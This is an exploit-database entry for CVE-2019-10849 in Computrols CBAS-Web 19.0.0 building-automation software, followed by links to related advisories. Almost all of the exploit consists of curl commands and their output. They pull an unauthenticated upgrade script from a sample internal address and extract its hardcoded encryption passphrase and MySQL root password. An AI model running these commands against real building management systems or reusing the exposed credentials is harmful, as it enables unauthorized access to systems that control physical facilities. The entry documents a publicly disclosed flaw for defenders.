Lucene search
LiquidWorm1337DAY-ID-33503HistoryNov 12, 2019 - 12:00 a.m.
CBAS-Web 19.0.0 - Information Disclosure Vulnerability
2019-11-1200:00:00
LiquidWorm
0day.today
65
0.049 Low
EPSS
Percentile
92.8%
# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"
Related
exploitpack
exploitpack
CBAS-Web 19.0.0 - Information Disclosure
2019-11-12 00:00:00
prion
prion
Code injection
2019-05-23 20:29:00
packetstorm
packetstorm
Computrols CBAS-Web 19.0.0 Information Disclosure
2019-11-12 00:00:00
cve
cve
CVE-2019-10849
2019-05-23 20:29:00
cvelist
cvelist
CVE-2019-10849
2019-05-23 19:05:01
nvd
nvd
CVE-2019-10849
2019-05-23 20:29:00
exploitdb
exploitdb
CBAS-Web 19.0.0 - Information Disclosure
2019-11-12 00:00:00
ics
ics
Computrols CBAS Web
2019-05-21 12:00:00